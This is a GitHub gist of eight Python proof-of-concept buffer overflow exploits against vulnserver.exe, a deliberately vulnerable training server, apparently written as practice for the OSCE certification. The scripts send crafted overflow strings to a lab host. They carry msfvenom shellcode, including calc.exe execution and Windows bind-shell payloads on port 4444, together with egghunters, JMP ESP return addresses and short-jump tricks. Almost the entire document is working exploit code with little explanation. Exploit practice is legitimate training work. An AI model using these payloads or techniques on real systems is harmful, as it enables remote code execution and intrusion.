Skip to content

Instantly share code, notes, and snippets.

@r00tpgp

r00tpgp/poc_GTER-W00T.py

Last active March 16, 2020 21:13
Show Gist options
  • Save r00tpgp/1e80108e1a3fa1e95151ef0d5023048c to your computer and use it in GitHub Desktop.
Save r00tpgp/1e80108e1a3fa1e95151ef0d5023048c to your computer and use it in GitHub Desktop.
Download ZIP
vulnserver.exe Buffer Overflow scripts in preparation for CTP/OSCE Exam
Raw
poc_gmon-egg.py
#!/usr/bin/python
# vulnserver.exe GMON BoF using egghunter by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
#
import socket
import os
import sys
host="172.16.155.133"
port=9999
#msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
buf = ""
buf += "\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
buf += "\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
buf += "\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
buf += "\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
buf += "\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
buf += "\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
buf += "\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
buf += "\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
buf += "\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
buf += "\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
buf += "\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
buf += "\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
buf += "\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
buf += "\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
buf += "\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
buf += "\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#625010B4 5B POP EBX
junk = "GMON ////" + "\x90" * (3518 - 4 - len(buf)-10-8) + "\x90"*10 + "T00WT00W" + buf + "\xeb\x0d\x90\x90" + "\xB4\x10\x50\x62" + "\x90"*10 + egg + "\x90" * (3518-10)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()
Raw
poc_gmon.py
#!/usr/bin/python
# vulnserver.exe GMON BoF using EIP overwrite by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
#
import socket
import os
import sys
host="172.16.155.133"
port=9999
junk1= "\x41" * 3518
#msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
buf = ""
buf += "\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
buf += "\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
buf += "\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
buf += "\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
buf += "\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
buf += "\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
buf += "\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
buf += "\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
buf += "\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
buf += "\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
buf += "\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
buf += "\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
buf += "\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
buf += "\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
buf += "\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
buf += "\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
shortjumpback = "\xeb\x89\x90\x90"
jumpback = "\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1"
#625010B4 5B POP EBX
junk = "GMON ////" + "\x90" * (3518 - 4 - len(buf)) + buf + "\xeb\x19\x90\x90" + "\xB4\x10\x50\x62" + "\x90"*30 + jumpback + "C" * (3518-30-len(jumpback))
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()
Raw
poc_GTER-W00T.py
#!/usr/bin/python
# vulnserver.exe GTER BoF using egghunter by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
# final evil payload is sent after few seconds delay to enable egghunter to locate it
#
import socket
import os
import sys
import time
host="172.16.155.133"
port=9999
#msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
buf = ""
buf += "\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
buf += "\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
buf += "\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
buf += "\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
buf += "\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
buf += "\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
buf += "\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
buf += "\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
buf += "\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
buf += "\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
buf += "\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
buf += "\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
buf += "\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
buf += "\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
buf += "\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
buf += "\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nops="\x90"*10
#625011AF FFE4 JMP ESP
junk = "GTER /.:/" + "\x41" * (146-len(egg)-20) + nops + egg + nops + "\xaf\x11\x50\x62" + "\xeb\xc6" + "\x42"*1000
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()
print "waiting 5 sec b4 launching payload..."
time.sleep(5)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
for cmd in ["SRUN ","TRUN ","GMON ","GDOG ","KSTET ","GTER "]:
expl.send(cmd+"T00WT00W"+buf)
expl.close()
Raw
poc_hter.py
#!/usr/bin/python
import socket
import os
import sys
import time
host="172.16.155.133"
port=9999
# msfpayload windows/shell_bind_tcp lport=4444 R | msfencode -b '\x00\x0a\x0d\x20' -t c
buf2=("\xdd\xc4\xb8\x54\x91\x67\x9c\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x56\x31\x43\x18\x83\xeb\xfc\x03\x43\x40\x73\x92\x60\x80\xfa"
"\x5d\x99\x50\x9d\xd4\x7c\x61\x8f\x83\xf5\xd3\x1f\xc7\x58\xdf"
"\xd4\x85\x48\x54\x98\x01\x7e\xdd\x17\x74\xb1\xde\x99\xb8\x1d"
"\x1c\xbb\x44\x5c\x70\x1b\x74\xaf\x85\x5a\xb1\xd2\x65\x0e\x6a"
"\x98\xd7\xbf\x1f\xdc\xeb\xbe\xcf\x6a\x53\xb9\x6a\xac\x27\x73"
"\x74\xfd\x97\x08\x3e\xe5\x9c\x57\x9f\x14\x71\x84\xe3\x5f\xfe"
"\x7f\x97\x61\xd6\xb1\x58\x50\x16\x1d\x67\x5c\x9b\x5f\xaf\x5b"
"\x43\x2a\xdb\x9f\xfe\x2d\x18\xdd\x24\xbb\xbd\x45\xaf\x1b\x66"
"\x77\x7c\xfd\xed\x7b\xc9\x89\xaa\x9f\xcc\x5e\xc1\xa4\x45\x61"
"\x06\x2d\x1d\x46\x82\x75\xc6\xe7\x93\xd3\xa9\x18\xc3\xbc\x16"
"\xbd\x8f\x2f\x43\xc7\xcd\x27\xa0\xfa\xed\xb7\xae\x8d\x9e\x85"
"\x71\x26\x09\xa6\xfa\xe0\xce\xc9\xd1\x55\x40\x34\xd9\xa5\x48"
"\xf3\x8d\xf5\xe2\xd2\xad\x9d\xf2\xdb\x78\x31\xa3\x73\xd2\xf2"
"\x13\x34\x82\x9a\x79\xbb\xfd\xbb\x81\x11\x88\xfb\x4f\x41\xd9"
"\x6b\xb2\x75\xcc\x37\x3b\x93\x84\xd7\x6d\x0b\x30\x1a\x4a\x84"
"\xa7\x65\xb8\xb8\x70\xf2\xf4\xd6\x46\xfd\x04\xfd\xe5\x52\xac"
"\x96\x7d\xb9\x69\x86\x82\x94\xd9\xc1\xbb\x7f\x93\xbf\x0e\xe1"
"\xa4\x95\xf8\x82\x37\x72\xf8\xcd\x2b\x2d\xaf\x9a\x9a\x24\x25"
"\x37\x84\x9e\x5b\xca\x50\xd8\xdf\x11\xa1\xe7\xde\xd4\x9d\xc3"
"\xf0\x20\x1d\x48\xa4\xfc\x48\x06\x12\xbb\x22\xe8\xcc\x15\x98"
"\xa2\x98\xe0\xd2\x74\xde\xec\x3e\x03\x3e\x5c\x97\x52\x41\x51"
"\x7f\x53\x3a\x8f\x1f\x9c\x91\x0b\x2f\xd7\xbb\x3a\xb8\xbe\x2e"
"\x7f\xa5\x40\x85\xbc\xd0\xc2\x2f\x3d\x27\xda\x5a\x38\x63\x5c"
"\xb7\x30\xfc\x09\xb7\xe7\xfd\x1b")
badchars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
egg = "6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7"
#77D3E6E7 JMP ESP
junk = "HTER " + "A"*(2041) + "e7e6d377" + "9090909090" + egg #+ "T00WT00W" + badchars
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()
time.sleep(1)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send("HTER T00WT00W"+buf2)
expl.close()
Raw
poc_kstet-T00W.py
#!/usr/bin/python
# vulnserver.exe KSTET BoF by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
# Only one evil payload with T00WT00W tag is sent after egghunter.
import socket
import os
import sys
host="172.16.155.133"
port=9999
#msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
buf = ""
buf += "\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
buf += "\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
buf += "\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
buf += "\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
buf += "\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
buf += "\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
buf += "\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
buf += "\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
buf += "\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
buf += "\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
buf += "\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
buf += "\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
buf += "\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
buf += "\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
buf += "\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
buf += "\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
# 625011AF FFE4 JMP ESP
ret = "\xAF\x11\x50\x62"
shortjmp = "\xeb\xb9\x90\x90"
egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
pattern ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"
#junk = "KSTET /.:/" + egg + "\x41" * (6-len(egg)) + ret + shortjmp + "\x43"*(5011-65-4)
junk ="KSTET /.://" + egg + "\x41"*(65-len(egg)) + ret + shortjmp + "\x43"*100
#junk1 = "GDOG " + "T00WT00W" + buf
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send("GDOG "+"T00WT00W"+buf)
expl.close()
Raw
poc_kstet.py
#!/usr/bin/python
# vulnserver.exe KSTET BoF by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
# Several final evil payloads sent immediately after egghunter is sent.
# Weird this one works immediately without the need to delay.
#
import socket
import os
import sys
host="172.16.155.133"
port=9999
#msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
buf = ""
buf += "\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
buf += "\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
buf += "\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
buf += "\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
buf += "\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
buf += "\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
buf += "\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
buf += "\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
buf += "\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
buf += "\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
buf += "\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
buf += "\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
buf += "\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
buf += "\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
buf += "\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
buf += "\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
# 625011AF FFE4 JMP ESP
ret = "\xAF\x11\x50\x62"
shortjmp = "\xeb\xb9\x90\x90"
egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
pattern ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"
#junk = "KSTET /.:/" + egg + "\x41" * (6-len(egg)) + ret + shortjmp + "\x43"*(5011-65-4)
junk ="KSTET /.://" + egg + "\x41"*(65-len(egg)) + ret + shortjmp + "\x43"*100
#junk1 = "GDOG " + "T00WT00W" + buf
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
vulnserver = ["STATS ","GDOG ","KTIME ","LTIME ","SRUN ","TRUN ","GMON ","GTER ","HTER ","LTER ","KSTAN "]
for cmd in vulnserver:
expl.send(cmd+"T00WT00W"+buf)
#print(cmd+"T00WT00W")
expl.close()
Raw
poc_LTER.py
#!/usr/bin/python
# vulnserver.exe LTER BoF by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
# You need to discover the bad chars and omitt it from the user defined buffer.
#
import socket
import os
import sys
import time
host="172.16.155.133"
port=9999
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/alpha_mixed BufferRegister=ESP -f c
buf=("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x7a\x48\x6f\x72\x35\x50"
"\x43\x30\x67\x70\x61\x70\x6b\x39\x5a\x45\x30\x31\x49\x50\x50"
"\x64\x4c\x4b\x32\x70\x66\x50\x6e\x6b\x70\x52\x76\x6c\x4e\x6b"
"\x50\x52\x66\x74\x6c\x4b\x34\x32\x31\x38\x34\x4f\x6f\x47\x70"
"\x4a\x31\x36\x55\x61\x4b\x4f\x6c\x6c\x75\x6c\x70\x61\x61\x6c"
"\x77\x72\x56\x4c\x75\x70\x79\x51\x38\x4f\x34\x4d\x66\x61\x78"
"\x47\x78\x62\x49\x62\x46\x32\x76\x37\x6e\x6b\x51\x42\x36\x70"
"\x6c\x4b\x72\x6a\x55\x6c\x6c\x4b\x42\x6c\x57\x61\x50\x78\x4a"
"\x43\x63\x78\x55\x51\x38\x51\x52\x71\x6e\x6b\x46\x39\x77\x50"
"\x66\x61\x39\x43\x6e\x6b\x77\x39\x66\x78\x6b\x53\x37\x4a\x71"
"\x59\x6c\x4b\x47\x44\x4c\x4b\x53\x31\x4a\x76\x70\x31\x59\x6f"
"\x4e\x4c\x7a\x61\x48\x4f\x74\x4d\x56\x61\x6a\x67\x46\x58\x6d"
"\x30\x52\x55\x6c\x36\x46\x63\x33\x4d\x5a\x58\x47\x4b\x53\x4d"
"\x35\x74\x74\x35\x5a\x44\x42\x78\x6c\x4b\x36\x38\x67\x54\x56"
"\x61\x6a\x73\x73\x56\x6e\x6b\x36\x6c\x62\x6b\x6c\x4b\x51\x48"
"\x77\x6c\x47\x71\x48\x53\x4c\x4b\x57\x74\x6c\x4b\x33\x31\x5a"
"\x70\x6b\x39\x30\x44\x55\x74\x71\x34\x51\x4b\x63\x6b\x75\x31"
"\x53\x69\x32\x7a\x42\x71\x79\x6f\x4b\x50\x71\x4f\x51\x4f\x52"
"\x7a\x6c\x4b\x77\x62\x68\x6b\x6e\x6d\x61\x4d\x33\x58\x75\x63"
"\x34\x72\x47\x70\x73\x30\x33\x58\x52\x57\x33\x43\x56\x52\x31"
"\x4f\x71\x44\x51\x78\x50\x4c\x61\x67\x66\x46\x76\x67\x49\x6f"
"\x48\x55\x4d\x68\x6a\x30\x46\x61\x35\x50\x35\x50\x36\x49\x48"
"\x44\x70\x54\x76\x30\x55\x38\x34\x69\x6b\x30\x50\x6b\x55\x50"
"\x49\x6f\x58\x55\x52\x4a\x37\x78\x56\x39\x30\x50\x68\x62\x79"
"\x6d\x71\x50\x32\x70\x77\x30\x56\x30\x51\x78\x5a\x4a\x54\x4f"
"\x69\x4f\x69\x70\x69\x6f\x48\x55\x4a\x37\x75\x38\x43\x32\x35"
"\x50\x54\x51\x63\x6c\x6c\x49\x58\x66\x71\x7a\x46\x70\x33\x66"
"\x76\x37\x42\x48\x78\x42\x49\x4b\x55\x67\x73\x57\x39\x6f\x38"
"\x55\x73\x67\x70\x68\x58\x37\x7a\x49\x65\x68\x59\x6f\x59\x6f"
"\x4b\x65\x70\x57\x51\x78\x64\x34\x5a\x4c\x67\x4b\x58\x61\x39"
"\x6f\x6e\x35\x43\x67\x4d\x47\x45\x38\x72\x55\x72\x4e\x42\x6d"
"\x70\x61\x4b\x4f\x6b\x65\x71\x78\x32\x43\x42\x4d\x55\x34\x37"
"\x70\x6e\x69\x6b\x53\x71\x47\x61\x47\x62\x77\x74\x71\x78\x76"
"\x73\x5a\x32\x32\x52\x79\x31\x46\x79\x72\x69\x6d\x62\x46\x59"
"\x57\x42\x64\x77\x54\x65\x6c\x53\x31\x55\x51\x4c\x4d\x47\x34"
"\x71\x34\x36\x70\x49\x56\x57\x70\x53\x74\x30\x54\x32\x70\x72"
"\x76\x63\x66\x33\x66\x71\x56\x56\x36\x70\x4e\x63\x66\x50\x56"
"\x31\x43\x42\x76\x35\x38\x43\x49\x38\x4c\x35\x6f\x4b\x36\x49"
"\x6f\x39\x45\x6e\x69\x39\x70\x52\x6e\x72\x76\x62\x66\x69\x6f"
"\x74\x70\x43\x58\x74\x48\x6b\x37\x67\x6d\x53\x50\x39\x6f\x7a"
"\x75\x6d\x6b\x38\x70\x68\x35\x6e\x42\x51\x46\x31\x78\x6d\x76"
"\x7a\x35\x6d\x6d\x6f\x6d\x79\x6f\x48\x55\x75\x6c\x65\x56\x43"
"\x4c\x46\x6a\x4f\x70\x59\x6b\x6b\x50\x63\x45\x66\x65\x4d\x6b"
"\x53\x77\x52\x33\x44\x32\x52\x4f\x61\x7a\x45\x50\x51\x43\x49"
"\x6f\x79\x45\x41\x41")
# Only use 'jmp esp' addr without bad chars outside the range of 79....FF
ret = "\x03\x12\x50\x62"
junk = "LTER ." + "\x41"*2006 + ret + buf
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()
Raw
poc_trun.py
#!/usr/bin/python
# vulnserver.exe TRUN BoF by r00tpgp
# 9/6/2018
# In preperation for CTP/OSCE
#
import socket
import os
import sys
host="172.16.155.133"
port=9999
junk1= "\x41" * 2003
# 0x625011AF JMP ESP
retn = "\xAF\x11\x50\x62"
#msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
buf = ""
buf += "\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
buf += "\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
buf += "\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
buf += "\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
buf += "\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
buf += "\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
buf += "\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
buf += "\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
buf += "\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
buf += "\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
buf += "\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
buf += "\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
buf += "\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
buf += "\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
buf += "\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
buf += "\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
NOPS ="\x90" * 30
junk = "TRUN /.:/" + junk1 + retn + NOPS + buf
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk + junk1)
expl.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment